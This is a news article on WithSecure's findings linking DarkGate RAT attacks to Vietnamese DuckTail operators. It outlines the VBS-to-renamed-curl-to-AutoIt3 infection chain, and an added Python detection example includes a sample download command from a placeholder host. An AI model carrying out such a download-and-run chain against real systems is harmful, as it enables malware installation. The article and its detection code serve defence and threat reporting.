Cybersecurity researchers at WithSecure have identified a connection between the Vietnamese DuckTail infostealer and DarkGate malware.
- Vietnamese cybercrime groups are actively targeting organizations in the UK, USA, and India with various MaaS infostealers and RATs, cybersecurity firm WithSecure reports.
- A connection has been identified between the recent DarkGate malware attacks and the group running a campaign to hijack Meta business accounts, because both sets of attacks use the same infrastructure.
Cybersecurity firm WithSecure, formerly F-Secure Business, has uncovered a link between the recent DarkGate malware attacks targeting its customers and Vietnam-based threat actors operating a campaign to hijack Meta business accounts and steal sensitive data.
According to WithSecure’s Detection and Response Team (DRT), multiple infection attempts with DarkGate malware were made against their clients’ organizations in the UK, USA, and India on 4 August 2023.
The lure documents, target patterns, themes, delivery methods, and overall attack tactics closely resemble the attack mechanism observed in the recent DuckTail infostealer campaigns. WithSecure has been tracking this infostealer for over a year.
DarkGate is a Remote Access Trojan (RAT) that first emerged in 2018. It is usually offered to cybercriminals as a Malware-as-a-Service (MaaS) tool and is a versatile malware used in a range of malicious activities, including cryptojacking, information theft, and ransomware attacks.
WithSecure researchers analyzed open-source data linked to the DarkGate malware campaign and established links to multiple infostealers. This pattern indicates that the same group or threat actor is launching these attacks.
“By identifying characteristics of DarkGate malware lures and campaigns, we have been able to find multiple pivot points which lead to other information stealers and malware being used in very similar if not identical campaigns, and it is assessed as likely that the same threat actor group performs these campaigns,” reads WithSecure’s report.
The attack commenced with a file named ‘Salary and new products.8.4.zip’. Once unwitting users downloaded and extracted it, a VBS script was executed. This script copied the legitimate Windows binary curl.exe to a new location under a different name and used it to connect to an external server and retrieve two additional files: autoit3.exe and a compiled AutoIt3 script. The script then launched the executable, which de-obfuscated and assembled the DarkGate RAT from strings embedded within the compiled script.
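A defender-side check for the loader chain just described, written as an added example (not WithSecure's code or detection logic): it flags a copy of curl.exe running under a different file name, and an AutoIt3 interpreter launched from a user-writable path by a script host, and reports the two as a chain when they occur in sequence. The event records and their Sysmon-style field names (Image, OriginalFileName, CommandLine, ParentImage) are constructed assumptions, not real telemetry.

```python
import ntpath
import re

# Assumption: these folders stand in for user-writable drop locations.
USER_WRITABLE = re.compile(r"\\(Users|Temp|AppData|ProgramData)\\", re.I)
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "cmd.exe"}


def is_renamed_curl(ev):
    """PE metadata still says curl.exe, but the on-disk image name differs."""
    orig = ev.get("OriginalFileName", "").lower()
    image = ntpath.basename(ev.get("Image", "")).lower()
    return orig == "curl.exe" and image != "curl.exe"


def is_autoit_loader(ev):
    """AutoIt3 run from a user-writable path with a compiled .au3 script,
    spawned by a script host rather than an installed application."""
    image = ntpath.basename(ev.get("Image", "")).lower()
    parent = ntpath.basename(ev.get("ParentImage", "")).lower()
    cmd = ev.get("CommandLine", "").lower()
    return (image == "autoit3.exe"
            and USER_WRITABLE.search(ev.get("Image", "")) is not None
            and ".au3" in cmd
            and parent in SCRIPT_HOSTS)


def score_chain(events):
    """Return alert names raised over an ordered list of process events.
    The AutoIt alert is upgraded to a chain alert only when a renamed-curl
    download was seen earlier, matching the VBS -> curl -> AutoIt3 order."""
    alerts, saw_curl = [], False
    for ev in events:
        if is_renamed_curl(ev):
            saw_curl = True
            alerts.append("renamed_curl")
        if is_autoit_loader(ev):
            alerts.append("autoit_loader_chain" if saw_curl else "autoit_loader")
    return alerts


# Constructed sample events; paths, names and URL are placeholders.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\wscript.exe", "OriginalFileName": "wscript.exe",
     "CommandLine": r'wscript.exe "C:\Users\u\Downloads\lure.vbs"', "ParentImage": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\Users\u\AppData\Local\Temp\x\y.exe", "OriginalFileName": "curl.exe",
     "CommandLine": "y.exe -o Autoit3.exe http://example.invalid/a", "ParentImage": r"C:\Windows\System32\wscript.exe"},
    {"Image": r"C:\Users\u\AppData\Local\Temp\x\Autoit3.exe", "OriginalFileName": "AutoIt3.exe",
     "CommandLine": "Autoit3.exe script.au3", "ParentImage": r"C:\Windows\System32\wscript.exe"},
]
```

Running `score_chain(SAMPLE_EVENTS)` on the constructed events yields the renamed-curl alert followed by the chain alert; a legitimate curl.exe in System32 raises nothing.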
WithSecure found strong identifiers that helped the company establish links between the two campaigns. It also noted that the attackers used a range of malware families and infostealers, including DuckTail, RedLine Stealer, and Lobshot.
“Based on what we’ve observed, it is very likely that a single actor is behind several of the campaigns we’ve been tracking that target Meta Business accounts,” stated WithSecure™ Senior Threat Intelligence Analyst Stephen Robinson in a blog post.
Once the attackers gain control of a Meta Business account, they can carry out a range of malicious activities, including distributing malware and conducting fraud. The lures and malicious documents used in the campaigns share identifiable metadata, including:
- LNK Drive ID
- MSI file metadata
- Canva PDF design service account details
These distinctive markers act as digital fingerprints, helping researchers link disparate campaigns to a single actor. However, many other groups could be using the same malware, which highlights the need to dig deep and find similarities in attack patterns rather than attributing campaigns on the basis of the malware family alone.
“DarkGate has been around for a long time and is being used by many groups for different purposes, not just this group or cluster in Vietnam,” Stephen Robinson, Senior Threat Intelligence Analyst at WithSecure™, explains.
Organizations must remain vigilant and employ stringent cybersecurity controls to prevent DarkGate and other malware threats. It is essential to keep antivirus solutions up to date, educate employees on cybersecurity best practices, use strong passwords backed by MFA (multi-factor authentication), and monitor network activity for suspicious behavior.